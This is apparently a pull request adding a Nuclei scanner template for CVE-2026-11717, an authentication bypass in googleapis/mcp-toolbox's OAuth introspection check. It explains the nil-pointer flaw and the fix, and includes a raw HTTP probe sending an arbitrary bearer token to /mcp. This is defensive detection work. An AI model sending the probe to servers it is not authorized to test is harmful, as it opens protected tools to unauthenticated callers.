### PR TITLE
Add CVE-2026-11717 MCP Toolbox OAuth introspection authentication bypass

### DIFF
--- a/http/cves/2026/CVE-2026-11717.yaml
+++ b/http/cves/2026/CVE-2026-11717.yaml
@@ -1,0 +1,65 @@
+id: CVE-2026-11717
+
+info:
+  name: googleapis/mcp-toolbox - Opaque Token Introspection Auth Bypass
+  author: str4k3r
+  severity: critical
+  description: |
+    The generic auth service's validateOpaqueToken function (internal/auth/generic/generic.go)
+    unmarshals the OAuth 2.0 introspection response (RFC 7662) into a struct
+    where Active is a pointer to a boolean. The rejection check was
+    `if introspectResp.Active != nil && !*introspectResp.Active`, which only
+    rejects a token when the introspection response explicitly sets
+    "active": false. If the "active" field is omitted from the response
+    entirely (Active stays a nil pointer), the check is skipped and the
+    token is treated as valid, letting an attacker reach the /mcp endpoint
+    with any arbitrary opaque bearer token. Fixed by inverting the check to
+    `if introspectResp.Active == nil || !*introspectResp.Active`, which
+    fails closed on a missing "active" field. This is reproducible end to
+    end only when the configured introspection endpoint can be made to
+    return a 200 response lacking "active" (e.g. the endpoint is
+    attacker-influenceable via SSRF/DNS rebinding, a compromised identity
+    provider, or an operator self-testing their own toolbox+IdP pairing) -
+    a compliant RFC 7662 provider always includes "active", so this does
+    not manifest against an unrelated, correctly behaving third-party IdP.
+  reference:
+    - https://github.com/googleapis/mcp-toolbox/commit/dfd66ee7de6fe9750d932d30bf3b67a2f4d2a176
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-11717
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.3
+    cve-id: CVE-2026-11717
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: googleapis
+    product: mcp-toolbox
+  tags: cve,cve2026,mcp-toolbox,authbypass,mcp
+
+http:
+  - raw:
+      - |
+        POST /mcp HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer nuclei-cve-11717-probe-{{randstr}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"tools/list","id":1}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"result"'
+      - type: word
+        part: body
+        words:
+          - "token is not active"
+          - "audience validation failed"
+          - '"error"'
+        negative: true


### PR DESCRIPTION
## Vulnerability
MCP Toolbox versions before 1.4.0 accept an opaque bearer token when the OAuth introspection response omits the RFC 7662 `active` field. The fixed code fails closed when `active` is missing or false.

## Template behavior
The template sends an arbitrary bearer token to `/mcp` and requests `tools/list`. A successful JSON-RPC response while the configured introspection service returns a 200 response without `active` indicates the bypass.

## Required configuration
The MCP Toolbox instance must use an introspection endpoint that you control for testing and that can return a 200 response without `active` (for example, an operator-owned mock IdP). Do not point this probe at an unrelated third-party identity provider.

## Impact
Unauthenticated callers may reach protected MCP tools and invoke actions exposed by the toolbox.

## Usage
```bash
nuclei -u <authorized-toolbox> -t http/cves/2026/CVE-2026-11717.yaml
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
